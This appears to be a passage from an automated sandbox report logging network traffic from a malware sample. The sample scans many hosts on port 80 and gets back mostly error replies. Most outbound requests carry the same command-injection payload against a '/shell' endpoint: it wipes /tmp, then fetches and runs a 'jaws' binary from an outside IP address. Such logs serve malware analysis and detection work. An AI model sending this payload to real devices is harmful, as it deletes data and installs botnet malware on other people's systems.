                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:58Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          413192.168.2.2340948145.236.36.12880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.769717932 CET502INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 2f 62 68 6f 63 20 32 33 73 65 70 32 30 30 34 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 37 20 46 65 62 20
                                                          Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.19/bhoc 23sep2004Date: Sat, 07 Feb 1970 10:05:37 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=UTF-8Connection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE></HE


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          414192.168.2.2339254146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.822169065 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:59Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          415192.168.2.2339260146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.171540976 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:59Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          416192.168.2.2339272146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.517657995 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:59Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          417192.168.2.2339278146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.883369923 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:00Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          418192.168.2.235265834.224.189.17680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.915016890 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          419192.168.2.233480834.206.169.21680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.915046930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.074887991 CET349INHTTP/1.1 503 Service Temporarily Unavailable
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:00 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          420192.168.2.2347712162.243.164.3680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.919883013 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.085668087 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:25:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          421192.168.2.233664468.68.1.22080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.920490980 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.085726023 CET784INHTTP/1.0 400 Bad request: request protocol version denied
                                                          Content-type: text/html; charset="iso-8859-1"
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 20 52 65 71 75 65 73 74 20 64 65 6e 69 65 64 20 62 79 20 57 61 74 63 68 47 75 61 72 64 20 48 54 54 50 20 70 72 6f 78 79 2e 20 3c 2f 68 33 3e 0d 0a 3c 62 3e 20 52 65 61 73 6f 6e 3a 20 3c 2f 62 3e 20 72 65 71 75 65 73 74 20 70 72 6f 74 6f 63 6f 6c 20 76 65 72 73 69 6f 6e 20 64 65 6e 69 65 64 20 6c 69 6e 65 3d 27 47 45 54 20 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 48 54 54 50 2f 31 2e 31 5c 78 30 64 5c 78 30 61 27 20 3c 62 72 3e 0d 0a 3c 68 72 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3e 0d 0a 3c 62 3e 20 4d 65 74 68 6f 64 3a 20 3c 2f 62 3e 20 47 45 54 20 3c 62 72 3e 0d 0a 3c 62 3e 20 48 6f 73 74 3a 20 3c 2f 62 3e 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 20 3c 62 72 3e 0d 0a 3c 62 3e 20 50 61 74 68 3a 20 3c 2f 62 3e 20 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 20 3c 62 72 3e 0d 0a 3c 68 72 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 41 44 20 2d 2d 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><body><h3> Request denied by WatchGuard HTTP proxy. </h3><b> Reason: </b> request protocol version denied line='GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0a' <br><hr size="1" noshade><b> Method: </b> GET <br><b> Host: </b> 212.102.41.2 <br><b> Path: </b> /shell?cd+/tmp;rm+-rf+*;wget+ <br><hr size="1" noshade></body> ... PAD --></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          422192.168.2.233382899.80.176.12580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.994556904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.237289906 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          423192.168.2.235555451.138.221.22480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:00.997014999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.239317894 CET292INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          424192.168.2.234169238.6.180.18480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:01.064193964 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.216890097 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          425192.168.2.235956498.4.73.1280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:01.180668116 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.364893913 CET500INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 02 Jan 2024 05:25:02 GMT
                                                          Server: HTTP Server
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          426192.168.2.2339314146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:01.239356995 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:00Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          427192.168.2.2339906185.18.81.6680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:01.307707071 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.551270962 CET440INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:25:01 GMT
                                                          Server: Apache
                                                          Vary: Accept-Encoding
                                                          Content-Length: 203
                                                          Keep-Alive: timeout=15, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          428192.168.2.2339342146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:01.566796064 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:01Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          429192.168.2.2339350146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:01.897305012 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:01Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          430192.168.2.235462052.215.63.14380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.012428999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.258810997 CET179INHTTP/1.1 404 Not Found
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:02 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 0
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          431192.168.2.234048051.75.21.17880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.016731024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          432192.168.2.2354616217.23.144.15980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.033209085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.298336029 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.1
                                                          Date: Tue, 02 Jan 2024 05:25:02 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
